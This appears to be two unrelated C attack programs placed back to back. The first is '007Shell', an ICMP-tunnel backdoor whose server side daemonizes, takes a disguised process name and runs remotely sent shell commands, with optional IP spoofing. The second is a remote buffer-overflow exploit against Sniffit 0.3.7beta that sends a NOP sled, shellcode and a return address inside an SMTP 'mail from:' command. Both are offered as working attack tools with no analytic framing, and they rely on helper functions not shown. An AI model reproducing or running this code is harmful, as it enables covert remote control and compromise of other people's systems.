int main(int argc, char **argv) { char data[MAXMESG] ; char recvdata[MAXMESG+BUFFSIZE] ; char senddata[MAXMESG+BUFFSIZE] ; int opt, off = 0, n, i ; int srvr = 0, clnt = 0 ; int pid, ret ; u_long hostaddress, cliaddress ; char buf[BUFFSIZE] ; char buf2[BUFFSIZE] ; FILE *job ; if (argc < 2) usage(argv[0]); while ((opt = getopt(argc, argv, "sch:S:")) != EOF) { switch(opt) { case 's': srvr++; break; case 'c': clnt++; break; case 'h': hostaddress = nameResolve(optarg); break; case 'S': ip_spoof = YEAH; spoof_addr = nameResolve(optarg); break; default: usage(argv[0]); } } if (srvr) strcpy(argv[0], "007Shell v.1.0 - Good Luck James ..."); if (!hostaddress && clnt) { fprintf(stderr, "\n\033[0;5;31mYou must specify the server address\033[0m\n\n"); exit(0); } if (clnt && !srvr) { printf("\033[0;32m007Shell v.1.0 - Let's Dig Covert !\033[m\n"); while (!ferror(stdin) && !feof(stdin)) { bzero(senddata, sizeof(senddata)); bzero(recvdata, sizeof(recvdata)); printf("\033[0;32m[covert@007Shell]# \033[0m"); if (fgets(data, MAXMESG, stdin) == NULL) break; data[strlen(data)-1] = 0; if(strstr(data, OFFLINE)) off = 1 ; strcat(senddata, data); if(ip_spoof == NOPE) { if( ICMP_send(senddata, strlen(senddata), hostaddress, 0, 0) < 0) { perror("\033[0;5;31mTunnel_Send: \033[0m"); exit(0); } if (off && clnt) { ICMP_reset(); printf("\033[0;32mSee ya Covert, James ...\033[0m\n"); exit(0); } while(1) { memset(recvdata, '\0', strlen(recvdata)); if((n=ICMP_recv(recvdata, MAXMESG, REPLY)) != -666) { printf("%s", recvdata); } else break; } } if(ip_spoof == YEAH) { if( ICMP_sp_send(senddata, strlen(senddata), hostaddress, spoof_addr) < 0) { perror("\033[0;5;31mTunnel_Send: \033[0m"); exit(0); } if (off && clnt) { ICMP_reset(); printf("\033[0;32mSee ya Covert, James ...\033[0m\n"); exit(0); } } } } else if(srvr && !clnt) { pid = fork(); if (pid != 0) { printf("\033[0;32m007Shell v.1.0 - Let's Go Covert !\033[0m\n"); exit(0); } setsid(); chdir(ROOTDIR); umask(0); while(!off) { ret = 0; bzero(senddata, sizeof(senddata)); bzero(recvdata, sizeof(recvdata)); if((n=ICMP_recv(recvdata, MAXMESG, 0)) < 0) { perror("\033[0;5;31mTunnel_Recv: \033[0m"); exit(0); } cliaddress = clisrc.sin_addr.s_addr; if(strstr(recvdata, OFFLINE)) { ICMP_reset(); exit(0); } if (!(job = popen(recvdata, "r"))) { perror("\033[0;5;31Popen: \033[0m"); exit(0); } while(fgets(buf, BUFFSIZE-1, job)) { ret++; bcopy(buf, buf2, BUFFSIZE); ICMP_send(buf2, strlen(buf2), cliaddress, REPLY, 0); } ICMP_send("", 0, cliaddress, 0, LAST); pclose(job); fflush(NULL); } } ICMP_reset(); exit(1); }
int main(int argc,char **argv) { char buff[LENGTH+ALIGNOP+1]; char cmd[610]; long addr; unsigned long sp; int offset=OFFSET; int i, x; int sock; struct sockaddr_in sin; if(argc<2) { fprintf(stderr, "Usage: %s <sniffit host>\n", argv[0]); exit(0); } sp=(unsigned long) RET; addr=sp-offset; for(i=0;i<120-ALIGNOP;i++) buff[i]=0x90; for(x=0; x<strlen(shellcode); i++, x++) buff[i]=shellcode[x]; for(i-=1 ; i<LENGTH; i+=4) { buff[i ] = addr & 0x000000ff; buff[i+1] = (addr & 0x0000ff00) >> 8; buff[i+2] = (addr & 0x00ff0000) >> 16; buff[i+3] = (addr & 0xff000000) >> 24; } printf("\nSniffit <=0.3.7beta Linux/x86 Remote Exploit\n"); printf("by FuSyS [S0ftpj|BFi] - http://www.s0ftpj.org\n\n"); memset(&sin,0,sizeof(sin)); sin.sin_family=AF_INET; sin.sin_port=htons(25); sin.sin_addr.s_addr=nameResolve(argv[1]); printf("Connecting to %s ...\n", argv[1]); if((sock=socket(AF_INET,SOCK_STREAM,0))<0) { printf("Can't create socket\n"); exit(0); } if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0) { printf("Can't connect to Sniffit Server\n"); exit(0); } printf("Injecting ShellCode ...\n"); strncat(cmd, "mail from:", 10); strncat(cmd, buff, strlen(buff)); write(sock, cmd, strlen(cmd)); printf("Done!\n\n"); return(0); }